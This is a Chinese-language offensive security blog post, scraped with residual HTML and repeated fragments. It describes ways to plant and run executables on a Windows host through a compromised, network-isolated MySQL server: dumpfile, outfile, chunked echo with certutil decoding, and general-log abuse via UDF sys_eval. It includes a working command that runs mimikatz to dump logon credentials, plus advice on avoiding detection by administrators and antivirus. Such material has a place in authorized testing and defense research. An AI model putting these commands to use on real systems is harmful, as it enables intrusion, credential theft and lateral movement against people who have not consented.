MySQL数据库不出网环境下落地Exe文件的方法探究<\/h1>

前言<\/h2>
在站库分离且数据库不出网、没有Webshell的情况下，如果需要对内网进行横向渗透，只能通过数据库来落地工具。本文详细探究了在MySQL数据库环境下多种落地可执行文件(Exe)的方法。<\/p>

环境准备<\/h2>

操作系统：Windows<\/li>
MySQL版本：5.7.26<\/li>

模拟环境：对web目录没有写入权限，但对lib\/plugin有写入权限，可以使用UDF执行命令<\/li> <\/ul>

方法一：使用dumpfile导出exe<\/h2>

1.1.1 导出exe文件<\/h3>

将exe文件转换为16进制，然后执行以下SQL语句：<\/p>

select<\/span> unhex("exe文件的16进制"<\/span>) into<\/span> dumpfile "\\\\路径\\\\文件名.exe"<\/span>
<\/span><\/span><\/code><\/pre>特点<\/strong>：<\/p>

导出的文件可以正常执行<\/li>
导出的路径必须使用双反斜杠"\\"以避免转义<\/li>
目标文件不能已存在，否则会报错<\/li>
<\/ul>
1.1.2 执行exe文件<\/h3>
示例：落地并执行mimikatz.exe<\/p>
select<\/span> sys_eval('C:\\phpstudy_pro\\Extensions\\MySQL5.7.26\\lib\\plugin\\M.exe "privilege::debug" "sekurlsa::logonpasswords" "exit" >> C:\\phpstudy_pro\\Extensions\\MySQL5.7.26\\lib\\plugin\\res1.txt"'<\/span>)
<\/span><\/span><\/code><\/pre>查看执行结果<\/strong>：<\/p>

使用Windows命令：more<\/code>或type<\/code><\/li>
使用MySQL函数：Load_file()<\/code><\/li>
<\/ul>
1.1.3 处理未退出的exe进程<\/h3>
如果exe程序没有自动终止（如mimikatz直接运行没有参数），可以通过以下方式关闭：<\/p>

查找进程ID：<\/li>
<\/ol>
select<\/span> sys_eval('tasklist \/svc |findstr "进程名.exe"'<\/span>)
<\/span><\/span><\/code><\/pre>
将结果进行16解码得到进程ID<\/li>
终止进程<\/li>
<\/ol>
1.1.4 注意事项<\/h3>

执行程序时会短暂弹出黑窗，目前没有完美解决方案<\/li>
执行前可使用query user<\/code>查看管理员是否在线，避免被发现<\/li>
<\/ul>
方法二：使用outfile导出（不推荐）<\/h2>
select<\/span> unhex("exe文件的16进制"<\/span>) into<\/span> outfile "\\\\路径\\\\文件名.exe"<\/span>
<\/span><\/span><\/code><\/pre>问题<\/strong>：<\/p>

outfile会转义换行符，导致exe无法正常执行<\/li>
导出的文件比原始文件大很多<\/li>
<\/ul>
方法三：使用echo分段导出<\/h2>
1.3.1 基本思路<\/h3>

使用echo将exe的16进制写入文件<\/li>
使用certutil解码还原为exe<\/li>
<\/ol>
select<\/span> sys_eval("echo exe_hex >> c:\\users\\admin\\desktop\aaa.txt && certutil -decodehex c:\\users\\admin\\desktop\aaa.txt c:\\users\\admin\\desktop\aaa.exe"<\/span>)
<\/span><\/span><\/code><\/pre>1.3.2 Windows命令行限制<\/h3>

Windows命令行最大长度为8191个字符<\/li>
exe的16进制通常远超过此限制（示例中为113898字节）<\/li>
<\/ul>
1.3.3 分段追加写入解决方案<\/h3>
使用set \/p<\/code>实现不换行追加：<\/p>
select<\/span> sys_eval("set \/p=\"<\/span>第一部分<\/span>16<\/span>进制\<\/span>" <nul >> c:\\aaa.txt"<\/span>)
<\/span><\/span>select<\/span> sys_eval("set \/p=\"<\/span>第二部分<\/span>16<\/span>进制\<\/span>" <nul >> c:\\aaa.txt"<\/span>)
<\/span><\/span>...
<\/span><\/span>select<\/span> sys_eval("certutil -decodehex c:\\aaa.txt c:\\aaa.exe"<\/span>)
<\/span><\/span><\/code><\/pre>问题<\/strong>：<\/p>

执行后命令不会自动终止，需要手动回车结束<\/li>
实际操作中需要编写脚本分段处理<\/li>
<\/ul>
方法四：利用MySQL日志导出<\/h2>
1.4.1 通用日志配置<\/h3>
show<\/span> variables like<\/span> 'general_log'<\/span>;  -- 查看日志是否开启
<\/span><\/span><\/span><\/span>set<\/span> global<\/span> general_log=<\/span>on<\/span>;  -- 开启日志功能
<\/span><\/span><\/span><\/span>show<\/span> variables like<\/span> 'general_log_file'<\/span>;  -- 查看日志文件保存位置
<\/span><\/span><\/span><\/span>set<\/span> global<\/span> general_log_file=<\/span>'log_path'<\/span>;  -- 设置日志文件保存位置
<\/span><\/span><\/span><\/code><\/pre>1.4.2 导出流程<\/h3>

设置日志路径并开启日志<\/li>
执行select "exe-hex"<\/code><\/li>
关闭日志记录<\/li>
从日志中提取exe-hex并解码<\/li>
<\/ol>
1.4.3 提取exe-hex的方法<\/h3>
使用PowerShell<\/strong>：<\/p>
powershell -c "&{$b=[System.IO.File]::ReadAllBytes('日志文件');set-content -value $b[开始位置..结束位置] -encoding byte -path '保存路径';}"<\/span>
<\/span><\/span><\/code><\/pre>使用Python<\/strong>：<\/p>
python -<\/span>c "import re;import binascii;z=re.findall('(4D5A.*?6500)<\/span>\"<\/span>',open('log.log').read());text=open('res1.exe','ab');text.write(binascii.a2b_hex(z[0]))"<\/span>
<\/span><\/span><\/code><\/pre>1.4.4 注意事项<\/h3>

尽量先设置日志路径再开启日志，减少干扰内容<\/li>
执行完select后立即关闭日志记录，否则可能无法读取<\/li>
PowerShell导出时会覆盖源文件<\/li>
<\/ul>
其他解码方式探究<\/h2>
除了certutil，还可以使用其他语言进行hex解码：<\/p>
Python解码<\/strong>：<\/p>
python -<\/span>c "import binascii;text=open('res.exe','ab');text.write(binascii.a2b_hex(open('exe-hex.txt').read()))"<\/span>
<\/span><\/span><\/code><\/pre>类似思路可应用于其他支持命令行执行的语言（PHP、Perl等）。<\/p>
方法对比总结<\/h2>



导出方式<\/th>
优点<\/th>
缺点<\/th>
推荐优先级<\/th>
<\/tr>
<\/thead>


dumpfile<\/td>
直接导出可执行exe<\/td>
需要做好免杀<\/td>
1<\/td>
<\/tr>

outfile<\/td>
-<\/td>
会转义换行符，exe无法执行<\/td>
不推荐<\/td>
<\/tr>

echo<\/td>
适用于不出网无写入权限环境<\/td>
操作繁琐，需分段处理<\/td>
3<\/td>
<\/tr>

日志<\/td>
隐蔽性较好<\/td>
需要过滤提取hex<\/td>
2<\/td>
<\/tr>
<\/tbody>
<\/table>
参考链接<\/h2>

Mysql日志介绍-通用日志<\/a><\/li>
Mysql 通用日志Getshell<\/a><\/li>
Windows命令行长度限制<\/a><\/li>
<\/ol>

导出方式<\/th>	优点<\/th>	缺点<\/th>	推荐优先级<\/th> <\/tr> <\/thead>
dumpfile<\/td>	直接导出可执行exe<\/td>	需要做好免杀<\/td>	1<\/td> <\/tr>
outfile<\/td>	-<\/td>	会转义换行符，exe无法执行<\/td>	不推荐<\/td> <\/tr>
echo<\/td>	适用于不出网无写入权限环境<\/td>	操作繁琐，需分段处理<\/td>	3<\/td> <\/tr>
日志<\/td>	隐蔽性较好<\/td>	需要过滤提取hex<\/td>	2<\/td> <\/tr> <\/tbody> <\/table> 参考链接<\/h2> Mysql日志介绍-通用日志<\/a><\/li> Mysql 通用日志Getshell<\/a><\/li> Windows命令行长度限制<\/a><\/li> <\/ol>

MySQL数据库不出网环境下落地Exe文件的方法探究<\/h1>

前言<\/h2> 在站库分离且数据库不出网、没有Webshell的情况下，如果需要对内网进行横向渗透，只能通过数据库来落地工具。本文详细探究了在MySQL数据库环境下多种落地可执行文件(Exe)的方法。<\/p>

方法一：使用dumpfile导出exe<\/h2>

方法三：使用echo分段导出<\/h2>

方法四：利用MySQL日志导出<\/h2>

参考链接<\/h2> Mysql日志介绍-通用日志<\/a><\/li> Mysql 通用日志Getshell<\/a><\/li> Windows命令行长度限制<\/a><\/li> <\/ol>

前言<\/h2>
在站库分离且数据库不出网、没有Webshell的情况下，如果需要对内网进行横向渗透，只能通过数据库来落地工具。本文详细探究了在MySQL数据库环境下多种落地可执行文件(Exe)的方法。<\/p>

参考链接<\/h2>

Mysql日志介绍-通用日志<\/a><\/li>
Mysql 通用日志Getshell<\/a><\/li>
Windows命令行长度限制<\/a><\/li> <\/ol>